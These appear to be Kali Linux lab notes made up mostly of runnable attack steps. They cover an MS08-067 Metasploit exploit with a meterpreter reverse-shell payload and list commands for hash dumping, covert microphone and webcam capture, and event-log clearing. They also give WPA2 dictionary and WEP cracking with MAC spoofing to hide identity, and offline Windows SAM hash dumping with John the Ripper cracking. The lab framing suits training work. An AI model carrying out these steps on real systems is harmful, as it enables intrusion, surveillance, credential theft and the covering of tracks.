OpenVAS is no longer included by default with Kali Linux.  To setup OpenVAS perform the following steps.  make sure you have the repository available in sources.list file.

nano  /etc/apt/sources.list

And make sure the following line is present.  If it is not, add it.

deb kali-rolling main non-free contrib

You can now install OpenVAS with the following commands:

apt update

apt install openvas


The openvas-setup command takes awhile to complete, so do not become impatient.  When it finishes running, be sure to copy the password into text editor and save. Now you need to rebuild your OpenVAS database with the following command:

openvasmd –rebuild

This command will also take awhile to complete.  Once it completes, you can access the web interface at https://localhost:9392.  The username is admin and the password previously saved.

A dictionary attack against a WPA2 protected access point is very easy using Kali Linux 2.0 and wifite.

wifite –wpa — crack –aircrack –dict /usr/share/wordlists/sqlmap.txt

I would recommend using a larger dictionary file than the sqlmap.txt file, Several large dictionary files are available online.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.


use exploit/windows/smb/ms08_067_netapi

set rhost

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack,
record_mic #record audio
webcam_list #list available webcams
web_snap #take a picture with the webcam
web_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute –f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system

Cracking WEP in Kali Linux 2.0 has become extrememly easy.  Open WiFite from the Applications menu and at the prompt type:

wifite –wep

Follow the onscreen instructions and the work is done for you.


WEP cracking instructions for Kali Linux 1.0

>>>Open a new terminal window


# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0

airmon-ng stop wlan0

# Stops the airmon-ng daemon

ifconfig wlan0 down

# stops the wireless interface

macchanger –mac 00:11:22:33:44:55 wlan0

# Spoofs your MAC address to hide your identity

airmon-ng start wlan0

# Starts the airmon-ng daemon

airodump-ng wlan0

# Locate available wireless access points to attack
# For our lab, look for WEPDEmo and note BSSID(MAC) and channel

airodump-ng -c 6 -w wepdemoattack –bssid 20:AA:4B:8B:A4:6E wlan0

# Start monitoring WEPDEmo for for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the file to save as
# –bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking
# wlan0 the wireless card you are monitoring with

>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Attempt to associate with the wireless access point
# -1 0 This is the number 1 and specifies the type of attack, fake authentication and    # delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access points SSID
# wlan0 is the interface we are attacking with

aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0

#Will send traffic to the access point and monitor

aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap

# Will attempt to crack the WEP encryption that has been detected so far
# Will check as you run it and then every 5000 ISVs – listed as #Data on the airodump    # terminal
>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

#Repeatedly run this to attempt to generate more traffic to speed up the attack
Eventually on the aircrack-ng screen you should see the correct WEP key

26:27:F6:85:97 for my demo



It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Restart the target Windows computer with your KALI Linux 2.0 system.  From time to time when you try to access the hard drive containing the Windows partition you may receive an error message related to the Windows hibernation file.  To avoid this, shutdown Windows at the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem.  Once you are in KALI, open up FILES and select your Windows hard drive to mount it.  Open a terminal window and enter the command


to determine the path to your Windows hard drive.  Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1.  Your path will be something like /media/root/OSDisk.  Browse to your mount point/Windows/System32/config folder.  Use the follwoing command to create a dump of the Windows passwords:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 –format=NT


For Kali Linux prior to version 2.0

Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt –format=nt2